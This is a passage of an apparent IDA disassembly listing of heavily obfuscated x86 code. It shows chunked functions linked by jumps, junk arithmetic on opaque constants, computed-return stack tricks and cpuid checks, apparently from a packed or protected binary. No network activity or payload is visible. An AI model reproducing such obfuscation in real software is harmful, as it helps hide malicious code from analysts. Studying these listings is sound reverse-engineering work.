add edx, ebp
jmp loc_42A52C
; END OF FUNCTION CHUNK FOR sub_42AA07
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_42623D: ; CODE XREF: sub_423172+3F4C�j
cdq
not ebp
jmp loc_424E4D
; END OF FUNCTION CHUNK FOR sub_423172
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_426245: ; CODE XREF: sub_42C443:loc_42BF45�j
; sub_42C443+98B�j
mov eax, 1
loc_42624A: ; CODE XREF: _7hdaygc1:00429227�j
xor edx, edx
cpuid
and eax, 0FFFh
add [esi], eax
jmp loc_42D2D8
; END OF FUNCTION CHUNK FOR sub_42C443
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_173. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425A37
loc_42625B: ; CODE XREF: sub_425A37:loc_425165�j
push ecx
push esi
push edi
mov esi, eax
pushf
xchg esi, [esp+10h+var_10]
mov eax, esi
jmp loc_42AD77
; END OF FUNCTION CHUNK FOR sub_425A37
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DAD9
loc_42626B: ; CODE XREF: sub_42DAD9:loc_42E8E8�j
mov eax, ebp
xchg eax, [esp+0]
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
push 0CE055D22h
jmp loc_426996
; END OF FUNCTION CHUNK FOR sub_42DAD9
; ---------------------------------------------------------------------------
locret_426280: ; CODE XREF: _7hdaygc1:loc_42B607�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A62
loc_426281: ; CODE XREF: sub_426A62+2313�j
jmp loc_4272DA
; END OF FUNCTION CHUNK FOR sub_426A62
; ---------------------------------------------------------------------------
add ecx, edx
loc_426288: ; CODE XREF: _7hdaygc1:loc_42405D�j
jmp sub_42ABE3
; ---------------------------------------------------------------------------
and eax, ebp
jmp sub_42E4B2
; ---------------------------------------------------------------------------
sbb ebp, ebx
jmp sub_423752
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B470
loc_42629B: ; CODE XREF: sub_42B470:loc_424436�j
push ecx
mov esp, ebp
pop ebp
mov eax, ds:dword_42B99C
call sub_42F528
loc_4262AA: ; CODE XREF: sub_423F02+A7F2�j
jmp loc_4234A1
; END OF FUNCTION CHUNK FOR sub_42B470
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CCDD
loc_4262AF: ; CODE XREF: sub_42CCDD+D6F�j
jmp loc_429AE8
; END OF FUNCTION CHUNK FOR sub_42CCDD
; ---------------------------------------------------------------------------
loc_4262B4: ; CODE XREF: _7hdaygc1:0042D09D�j
jmp locret_423C9F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42581B
loc_4262B9: ; CODE XREF: sub_42581B-FEC�j
jmp loc_42843B
; END OF FUNCTION CHUNK FOR sub_42581B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DFC
loc_4262BE: ; CODE XREF: sub_423DFC+40B9�j
jnz loc_425A5A
loc_4262C4: ; CODE XREF: sub_42F075-BB6E�j
jmp loc_428DB3
; END OF FUNCTION CHUNK FOR sub_423DFC
; ---------------------------------------------------------------------------
rol ebx, 2
xor ebp, edx
cdq
jmp loc_425A55
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42837F
loc_4262D4: ; CODE XREF: sub_42837F:loc_42E9BC�j
mov esp, ebp
push offset sub_42CDF7
jmp loc_426AE2
; END OF FUNCTION CHUNK FOR sub_42837F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A2EF
loc_4262E0: ; CODE XREF: sub_42A2EF:loc_42CBFC�j
mov edx, 4CB976E9h
push ebx
push 0E885699Eh
pop ebx
and ebx, 0E37D84B0h
add ebx, ds:4000F7h
cmp ebx, 0AEAE4497h
jmp loc_423EA8
; END OF FUNCTION CHUNK FOR sub_42A2EF
; =============== S U B R O U T I N E =======================================
sub_426303 proc near ; CODE XREF: _7hdaygc1:004286BA�j
; sub_429318+6588�p
arg_0 = dword ptr 4
xchg eax, [esp+0]
pop eax
add ebx, 131DD441h
xchg ebx, [esp-4+arg_0]
jmp sub_426941
sub_426303 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_426315 proc near ; DATA XREF: sub_426606+89AC�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042715D SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004286BF SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042A069 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042DD27 SIZE 00000005 BYTES
sub eax, 40h
sub eax, 10h
push edx
mov edx, eax
xchg edx, [esp+4+var_4]
mov eax, [ebp-4]
push eax
jmp loc_42A069
sub_426315 endp
; ---------------------------------------------------------------------------
loc_42632A: ; DATA XREF: _7hdaygc1:0042BF87�o
add eax, ecx
pop ecx
mov eax, [eax]
push ebx
mov ebx, eax
xchg ebx, [esp]
push ecx
push 0F24CF880h
jmp loc_423FF2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423410
loc_426340: ; CODE XREF: sub_423410+4B45�j
or edi, 3CF42908h
xor ebx, 1A51658Fh
loc_42634C: ; CODE XREF: sub_423410:loc_424CEC�j
push edi
push 8A1C9F5Ah
jmp loc_423DBE
; END OF FUNCTION CHUNK FOR sub_423410
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C369
loc_426357: ; CODE XREF: sub_42C369:loc_42E93F�j
push offset loc_425018
jmp loc_4243CF
; END OF FUNCTION CHUNK FOR sub_42C369
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DFC
loc_426361: ; CODE XREF: sub_423DFC+101E�j
add eax, ebp
add eax, 0F6437443h
mov eax, [eax]
call sub_42F0B4
jmp loc_42AD64
; END OF FUNCTION CHUNK FOR sub_423DFC
; ---------------------------------------------------------------------------
jnp loc_42D538
jnp loc_4251BE
jmp sub_42CB0F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A4F1
loc_426386: ; CODE XREF: sub_42A4F1-561C�j
jo loc_42C025
sub eax, ebx
loc_42638E: ; CODE XREF: sub_42A4F1:loc_4299F4�j
push offset sub_424E1F
jmp loc_42A048
; END OF FUNCTION CHUNK FOR sub_42A4F1
; ---------------------------------------------------------------------------
push offset sub_42FC2D
jmp loc_42AD5F
; ---------------------------------------------------------------------------
loc_4263A2: ; DATA XREF: _7hdaygc1:00428D40�o
xchg edi, [esp]
jmp loc_425F91
; ---------------------------------------------------------------------------
loc_4263AA: ; CODE XREF: _7hdaygc1:0042ADBB�j
pop edx
; =============== S U B R O U T I N E =======================================
sub_4263AB proc near ; CODE XREF: sub_425360+629D�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00425FEC SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00428DDC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042908E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E4CD SIZE 00000008 BYTES
xchg ecx, [esp+0]
pop ecx
xchg ebx, [esp+0]
jmp loc_428DDC
sub_4263AB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A6C3
loc_4263B7: ; CODE XREF: sub_42A6C3:loc_426F78�j
popf
push 98484CEDh
ror ebx, 10h
xchg esi, [edi]
jmp loc_424BDD
; END OF FUNCTION CHUNK FOR sub_42A6C3
; ---------------------------------------------------------------------------
loc_4263C7: ; DATA XREF: sub_425492+4A1F�o
add eax, 2AD381BDh
mov eax, [eax]
mov [ebp-4], eax
call sub_42AEE4
; START OF FUNCTION CHUNK FOR sub_423172
loc_4263D7: ; CODE XREF: sub_423172+8B1D�j
jmp sub_42C1AF
; END OF FUNCTION CHUNK FOR sub_423172
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F8C4
loc_4263DC: ; CODE XREF: sub_42F8C4-6142�j
jge loc_42D5DE
push edi
or edx, 672F5889h
jmp loc_429D8B
; END OF FUNCTION CHUNK FOR sub_42F8C4
; ---------------------------------------------------------------------------
cmp edx, 3147DC44h
jmp loc_428A63
; =============== S U B R O U T I N E =======================================
sub_4263F9 proc near ; DATA XREF: _7hdaygc1:0042AAF5�o
push ebx
mov eax, 2
push ecx
push 0DDD1E4EAh
pop ecx
and ecx, 0B0A362CCh
xor ecx, 0F9E1E8C7h
jmp loc_424A33
sub_4263F9 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A052
loc_426417: ; CODE XREF: sub_42A052-5843�j
jbe loc_42A898
or edi, esi
xor edx, 1AC578F2h
jmp loc_429A54
; END OF FUNCTION CHUNK FOR sub_42A052
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_42642A: ; CODE XREF: sub_42C443:loc_42D2D8�j
xor [esi], edx
mov eax, 80000000h
cpuid
cmp eax, 80000000h
jbe loc_42E845
jmp loc_42ABF0
; END OF FUNCTION CHUNK FOR sub_42C443
; ---------------------------------------------------------------------------
mov edx, 0C231F698h
push edi
push 466E7E29h
xchg eax, [esp]
mov edi, eax
pop eax
jmp loc_42EC5C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F642
loc_426459: ; CODE XREF: sub_42F642+D�j
pop esi
and esi, 7A9823CBh
or esi, 86D5C4B8h
cmp esi, 8B9E4C66h
jmp loc_425113
; END OF FUNCTION CHUNK FOR sub_42F642
; =============== S U B R O U T I N E =======================================
sub_426471 proc near ; CODE XREF: _7hdaygc1:0042AA6C�j
; _7hdaygc1:loc_42E047�p
; FUNCTION CHUNK AT 004250D1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00428F0C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042998F SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
add eax, 0C488D0A8h
mov eax, [eax]
jmp loc_428F0C
sub_426471 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F30D
loc_426482: ; CODE XREF: sub_42F30D:loc_4239C5�j
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_42F30D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B74A
loc_426484: ; CODE XREF: sub_42B74A+F27�j
jmp loc_423013
; END OF FUNCTION CHUNK FOR sub_42B74A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B907
loc_426489: ; CODE XREF: sub_42B907:loc_42B90F�j
jmp loc_42880D
; END OF FUNCTION CHUNK FOR sub_42B907
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4288FE
loc_42648E: ; CODE XREF: sub_4288FE-1C4E�j
jmp loc_4245F5
; END OF FUNCTION CHUNK FOR sub_4288FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_426493: ; CODE XREF: sub_423172+D�j
; sub_42A17C+6�j
rol eax, 17h
loc_426496: ; CODE XREF: _7hdaygc1:loc_426BF1�j
push ecx
jmp loc_4272BE
; END OF FUNCTION CHUNK FOR sub_423172
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BAD
loc_42649C: ; CODE XREF: sub_425BAD:loc_4267F1�j
mov [ebp-4], eax
mov edx, [ebp-8]
mov eax, [ebp-4]
call sub_42BFDF
mov edx, [ebp-8]
mov eax, [ebp-4]
call nullsub_4
jmp loc_424A4B
; END OF FUNCTION CHUNK FOR sub_425BAD
; ---------------------------------------------------------------------------
loc_4264BA: ; CODE XREF: _7hdaygc1:00429171�j
add ebx, 0F4DCF7D8h
; =============== S U B R O U T I N E =======================================
sub_4264C0 proc near ; CODE XREF: _7hdaygc1:0042C33A�p
xchg edi, [esp+0]
pop edi
add ecx, ebp
push offset sub_42D5BD
jmp nullsub_204
sub_4264C0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425A37
loc_4264D0: ; CODE XREF: sub_425A37:loc_424DB3�j
pop eax
xor eax, 0B0AC8047h
sub eax, 0D463D60Ch
and eax, 0F9C6708h
xor eax, 4E91D931h
jmp loc_428576
; END OF FUNCTION CHUNK FOR sub_425A37
; ---------------------------------------------------------------------------
jnp loc_423E0D
jmp sub_42EBFB
; ---------------------------------------------------------------------------
mov edx, [ebp-4]
push 6872B9F0h
pop eax
and eax, 0E5DDBC9Eh
add eax, 27663758h
add eax, ebp
add eax, 78491008h
mov ecx, [ebp-30h]
jmp loc_42AE28
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D002
loc_42651E: ; CODE XREF: sub_42D002-73A8�j
js loc_428D5B
loc_426524: ; CODE XREF: sub_42D002:loc_42D00E�j
or edi, 0D63ACC29h
add edi, 2A07B0D5h
xchg edi, [esp+0]
jmp loc_423B8D
; END OF FUNCTION CHUNK FOR sub_42D002
; ---------------------------------------------------------------------------
loc_426538: ; CODE XREF: _7hdaygc1:0042B509�j
jge loc_4281AE
; =============== S U B R O U T I N E =======================================
sub_42653E proc near ; CODE XREF: sub_425C2C:loc_42BC94�p
; FUNCTION CHUNK AT 004284C8 SIZE 00000008 BYTES
xchg edi, [esp+0]
pop edi
mov eax, [eax]
jmp loc_4284C8
sub_42653E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
xchg eax, [edi]
adc ebp, 74E16F48h
jmp sub_42A607
; ---------------------------------------------------------------------------
pushf
jmp sub_4260B4
; =============== S U B R O U T I N E =======================================
sub_42655C proc near ; CODE XREF: _7hdaygc1:0042D429�j
; sub_42D16D+287F�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00425A03 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425A20 SIZE 0000000A BYTES
xchg ecx, [esp+0]
pop ecx
mov eax, [ebp-8]
cdq
add eax, [esp+0]
jmp loc_425A20
sub_42655C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42656C: ; CODE XREF: _7hdaygc1:loc_42397C�j
; _7hdaygc1:00428103�j
mov eax, [ebp-28h]
cmp eax, [ebp-14h]
jmp loc_42B7D3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429318
loc_426577: ; CODE XREF: sub_429318-270A�j
; _7hdaygc1:0042F2D4�j
push offset sub_42E85F
jmp nullsub_21
; END OF FUNCTION CHUNK FOR sub_429318
; =============== S U B R O U T I N E =======================================
sub_426581 proc near ; DATA XREF: sub_4263AB-3B7�o
mov dword ptr [ebp-8], 1
sub_426581 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42DD73
loc_426588: ; CODE XREF: _7hdaygc1:0042CCC7�j
; sub_42DD73+B�j
lea eax, loc_424FDB
push edx
push 3CD9A7D3h
pop edx
and edx, 99BFDF5Eh
jmp loc_428DD7
; END OF FUNCTION CHUNK FOR sub_42DD73
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_4265A0: ; CODE XREF: sub_423172:loc_428571�j
add ecx, 0FD9BE1Dh
add ecx, ebp
add ecx, 0C6562B04h
mov [ecx], eax
pop ecx
inc dword ptr [ebp-10h]
cmp dword ptr [ebp-8], 0
jnz loc_424E4D
jmp loc_42B3D5
; END OF FUNCTION CHUNK FOR sub_423172
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291A3
loc_4265C3: ; CODE XREF: sub_4291A3:loc_42359E�j
mov eax, [eax]
mov ds:dword_425154, eax
xor eax, eax
mov ds:dword_425150, eax
loc_4265D1: ; CODE XREF: _7hdaygc1:loc_4259D2�j
jmp loc_42B68F
; END OF FUNCTION CHUNK FOR sub_4291A3
; ---------------------------------------------------------------------------
mov [ebp-0Ch], eax
cmp dword ptr [ebp-4], 0
loc_4265DD: ; CODE XREF: _7hdaygc1:00429C58�j
jz loc_4270F0
jmp loc_42B4BF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_4265E8: ; CODE XREF: sub_423172+9179�j
sub edi, 0FA74526h
loc_4265EE: ; CODE XREF: _7hdaygc1:loc_42DEF5�j
sbb ebp, edx
jmp loc_42F6E9
; END OF FUNCTION CHUNK FOR sub_423172
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C7F3
loc_4265F5: ; CODE XREF: sub_42C7F3+13�j
and edx, 5259491Dh
cmp edx, 9908828Eh
jmp loc_42DD3D
; END OF FUNCTION CHUNK FOR sub_42C7F3
; =============== S U B R O U T I N E =======================================
sub_426606 proc near ; DATA XREF: _7hdaygc1:00429C6F�o
; FUNCTION CHUNK AT 0042EFA4 SIZE 00000018 BYTES
push 0B9648053h
pop eax
or eax, 5F19C5AFh
xor eax, 3B194E05h
add eax, ebp
add eax, 3B9B73EAh
jmp loc_42EFA4
sub_426606 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4246D7
loc_426625: ; CODE XREF: sub_4246D7:loc_4286AD�j
or dword ptr [eax-8], 4
mov eax, [ebp-4]
movzx eax, byte ptr [eax]
push offset loc_424DD1
jmp loc_424E97
; END OF FUNCTION CHUNK FOR sub_4246D7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429FC3
loc_426639: ; CODE XREF: sub_429FC3:loc_42EE3D�j
cmp dword ptr [ebp-4], 0
jnz loc_4252E5
lea eax, [ebp-125h]
push eax
call sub_4252F5
jmp loc_4252E2
; END OF FUNCTION CHUNK FOR sub_429FC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DDB
loc_426654: ; CODE XREF: sub_423DDB:loc_428480�j
mov [esi], eax
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_423DDB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42616B
loc_426658: ; CODE XREF: sub_42616B+638A�j
jmp loc_42A41C
; END OF FUNCTION CHUNK FOR sub_42616B
; ---------------------------------------------------------------------------
loc_42665D: ; CODE XREF: _7hdaygc1:0042BEAC�j
rol eax, 11h
push ebx
jmp loc_429DE7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA07
loc_426666: ; CODE XREF: sub_42AA07+50E7�j
cmp edx, 40348E6Ch
jmp loc_42B625
; END OF FUNCTION CHUNK FOR sub_42AA07
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_426671: ; CODE XREF: sub_424AE1+3543�j
jo loc_42A19A
push ebx
shr ecx, 3
jle loc_42859B
loc_426681: ; CODE XREF: sub_424AE1:loc_426D25�j
push 0BDAA90C0h
pop eax
jmp loc_429F17
; END OF FUNCTION CHUNK FOR sub_424AE1
; ---------------------------------------------------------------------------
push offset sub_425561
jmp locret_42369D
; ---------------------------------------------------------------------------
loc_426696: ; CODE XREF: _7hdaygc1:00428B26�j
jg loc_4244B0
jmp loc_42AEEF
; ---------------------------------------------------------------------------
loc_4266A1: ; CODE XREF: _7hdaygc1:00423134�j
shr edi, 1Ch
test ecx, 0CBD54C38h
jmp loc_429D30
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424B63
loc_4266AF: ; CODE XREF: sub_424B63+1A�j
mov eax, [eax]
add eax, [ebp-4]
add eax, 5
cmp eax, ds:dword_423B1C
jmp loc_42858E
; END OF FUNCTION CHUNK FOR sub_424B63
; ---------------------------------------------------------------------------
rol ebp, 0Ah
test eax, 6867C0ECh
jmp loc_429266
; ---------------------------------------------------------------------------
not edx
jmp sub_4259F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42948A
loc_4266D7: ; CODE XREF: sub_42948A-146D�j
; sub_42C16F:loc_42883F�j
jz loc_42ACA4
jmp loc_42FBB6
; END OF FUNCTION CHUNK FOR sub_42948A
; ---------------------------------------------------------------------------
push 959B2E2Ah
or edx, esi
jmp sub_42F291
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFB3
loc_4266EE: ; CODE XREF: sub_42AFB3:loc_423CF7�j
push offset loc_425732
jmp sub_42F1E7
; END OF FUNCTION CHUNK FOR sub_42AFB3
; =============== S U B R O U T I N E =======================================
sub_4266F8 proc near ; DATA XREF: sub_42F4CE:loc_428AE7�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00424733 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CEFC SIZE 00000012 BYTES
mov eax, offset dword_42E198
mov edx, [ebp-4]
push ebp
mov ebp, eax
xchg ebp, [esp+4+var_4]
jmp loc_424733
sub_4266F8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
locret_42670B: ; CODE XREF: _7hdaygc1:loc_42EB4D�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427455
loc_42670C: ; CODE XREF: sub_427455+17�j
jmp loc_42537C
; END OF FUNCTION CHUNK FOR sub_427455
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429EBB
loc_426711: ; CODE XREF: sub_429EBB-3F4D�j
jmp loc_42E496
; END OF FUNCTION CHUNK FOR sub_429EBB
; ---------------------------------------------------------------------------
or edx, edi
jmp sub_42525E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B74A
loc_42671D: ; CODE XREF: sub_42B74A:loc_428E37�j
rol edx, 17h
loc_426720: ; CODE XREF: _7hdaygc1:loc_42964E�j
jns loc_4295AC
add ebx, 0FB434B20h
cmp eax, 0C2A720BAh
jmp loc_423398
; END OF FUNCTION CHUNK FOR sub_42B74A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_155. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_426738 proc near ; DATA XREF: _7hdaygc1:0042E2D7�o
arg_0 = dword ptr 4
add ebx, 50E2AB46h
popf
xchg ebx, [esp-4+arg_0]
jmp sub_42C16F
sub_426738 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425182
loc_426747: ; CODE XREF: sub_425182+8�j
cmp al, 0C2h
jz loc_4236DB
mov eax, [ebp-4]
mov ax, [eax]
and ax, 38FFh
jmp loc_4289EF
; END OF FUNCTION CHUNK FOR sub_425182
; ---------------------------------------------------------------------------
loc_42675E: ; CODE XREF: _7hdaygc1:loc_42BC50�j
push ebx
call sub_427D11
; START OF FUNCTION CHUNK FOR sub_42F528
loc_426764: ; CODE XREF: sub_42F528-B62�j
jmp nullsub_43
; END OF FUNCTION CHUNK FOR sub_42F528
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424F62
loc_426769: ; CODE XREF: sub_424F62+5FB7�j
jmp loc_42AC5B
; END OF FUNCTION CHUNK FOR sub_424F62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42874A
loc_42676E: ; CODE XREF: sub_42874A-1976�j
jmp loc_42D338
; END OF FUNCTION CHUNK FOR sub_42874A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E0C4
loc_426773: ; CODE XREF: sub_42E0C4-199�j
add edi, 1BB9912Dh
not ebp
loc_42677B: ; CODE XREF: sub_42E0C4:loc_42DF1A�j
xor eax, 80E84129h
push offset loc_42A207
jmp loc_4290D6
; END OF FUNCTION CHUNK FOR sub_42E0C4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_211. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E254
loc_42678C: ; CODE XREF: sub_42E254+1�j
jmp loc_42EE21
; END OF FUNCTION CHUNK FOR sub_42E254
; ---------------------------------------------------------------------------
push edi
loc_426792: ; CODE XREF: _7hdaygc1:loc_423201�j
push 0EC882A30h
loc_426797: ; CODE XREF: _7hdaygc1:00428353�j
pop edi
add edi, 5706251Bh
or edi, 6FE89FB3h
jmp loc_42B0AC
; ---------------------------------------------------------------------------
add edx, 0FF6CB7DFh
jmp sub_424385
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FA3D
loc_4267B4: ; CODE XREF: sub_42FA3D:loc_42FA43�j
mov [ebp-40h], eax
mov eax, [ebp-40h]
xor edx, edx
mov [eax], edx
push 0AB66032Ch
pop eax
jmp loc_42BB0A
; END OF FUNCTION CHUNK FOR sub_42FA3D
; ---------------------------------------------------------------------------
loc_4267C9: ; CODE XREF: _7hdaygc1:0042EB8F�j
add ebp, 4D4925A8h
; START OF FUNCTION CHUNK FOR sub_42A6C3
loc_4267CF: ; CODE XREF: sub_42A6C3+44B6�j
add eax, 0C783DF18h
push offset loc_428BED
jmp nullsub_117
; END OF FUNCTION CHUNK FOR sub_42A6C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BAD
loc_4267DF: ; CODE XREF: sub_425BAD:loc_42C344�j
add eax, 0F7363506h
or eax, 24670731h
jnz loc_42DF01
loc_4267F1: ; CODE XREF: _7hdaygc1:004254B3�j
; sub_42E4B2+13�j
jmp loc_42649C
; END OF FUNCTION CHUNK FOR sub_425BAD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4269BB
loc_4267F6: ; CODE XREF: sub_4269BB+2A41�j
jmp loc_42DDE3
; END OF FUNCTION CHUNK FOR sub_4269BB
; ---------------------------------------------------------------------------
xchg ebp, [ebx]
jmp loc_423047
; ---------------------------------------------------------------------------
and eax, ecx
jmp loc_42B146
; ---------------------------------------------------------------------------
loc_426809: ; CODE XREF: _7hdaygc1:0042EBF6�j
pop edx
xor eax, 0E5817B54h
test eax, 4000000h
jmp loc_428C36
; =============== S U B R O U T I N E =======================================
sub_42681B proc near ; CODE XREF: _7hdaygc1:0042D1DD�j
; _7hdaygc1:loc_42D728�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
xchg ebx, [esp+0]
pop ebx
add eax, [esp-4+arg_0]
adc edx, [esp-4+arg_4]
sub_42681B endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_425C2C
loc_426826: ; CODE XREF: sub_425C2C:loc_42A9ED�j
add esp, 8
jmp loc_42BC94
; END OF FUNCTION CHUNK FOR sub_425C2C
; ---------------------------------------------------------------------------
push offset loc_423A1D
jmp loc_42A0FF
; ---------------------------------------------------------------------------
loc_426838: ; DATA XREF: _7hdaygc1:loc_42D1AE�o
add eax, 8292DEDDh
loc_42683E: ; CODE XREF: _7hdaygc1:loc_42AC0C�j
mov eax, [eax]
or eax, eax
jnz loc_42BB0F
jmp loc_4242EF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA47
loc_42684D: ; CODE XREF: sub_42AA47-4BEE�j
push 660D1467h
mov [ecx], ebx
shl eax, 1Dh
jmp loc_4249A1
; END OF FUNCTION CHUNK FOR sub_42AA47
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429532
loc_42685C: ; CODE XREF: sub_429532+363B�j
cmp ds:dword_427474[eax*4], 0
jz loc_4236E2
mov eax, [ebp-4]
cmp byte ptr [eax], 0CFh
jz loc_4236DB
mov eax, [ebp-4]
loc_426879: ; CODE XREF: sub_429532:loc_4247FF�j
cmp byte ptr [eax], 0E9h
jmp loc_4283DA
; END OF FUNCTION CHUNK FOR sub_429532
; ---------------------------------------------------------------------------
loc_426881: ; CODE XREF: _7hdaygc1:loc_42AEEF�j
jle loc_426C06
jmp loc_42903D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424CE0
loc_42688C: ; CODE XREF: sub_424CE0+22C4�j
pop ebp
pop esi
pop ecx
pop ebx
pop ebp
jmp loc_423B88
; END OF FUNCTION CHUNK FOR sub_424CE0
; ---------------------------------------------------------------------------
pop ebp
jmp sub_42F8C4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425008
loc_42689C: ; CODE XREF: sub_425008:loc_429B89�j
add ecx, 97E3D9C8h
mov ecx, [ecx]
pushf
push offset loc_42B3E1
jmp nullsub_213
; END OF FUNCTION CHUNK FOR sub_425008
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EBD6
loc_4268AF: ; CODE XREF: sub_42EBD6:loc_42869D�j
or edi, 0CCD8AA89h
push esi
jmp loc_42D292
; END OF FUNCTION CHUNK FOR sub_42EBD6
; ---------------------------------------------------------------------------
loc_4268BB: ; CODE XREF: _7hdaygc1:00425195�j
mov [ecx], edi
; =============== S U B R O U T I N E =======================================
sub_4268BD proc near ; CODE XREF: sub_42BA2C+40E6�p
; FUNCTION CHUNK AT 004247A6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424BB7 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042C879 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
push 407B316Bh
pop edi
add edi, 0CA4FC17Ah
jmp loc_42C879
sub_4268BD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4268D2: ; CODE XREF: _7hdaygc1:00423C19�j
jg loc_42CFCE
cdq
; =============== S U B R O U T I N E =======================================
sub_4268D9 proc near ; CODE XREF: sub_42AA47:loc_4250B3�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004240BD SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00424195 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042599C SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0042610F SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00428DE1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C09D SIZE 0000001A BYTES
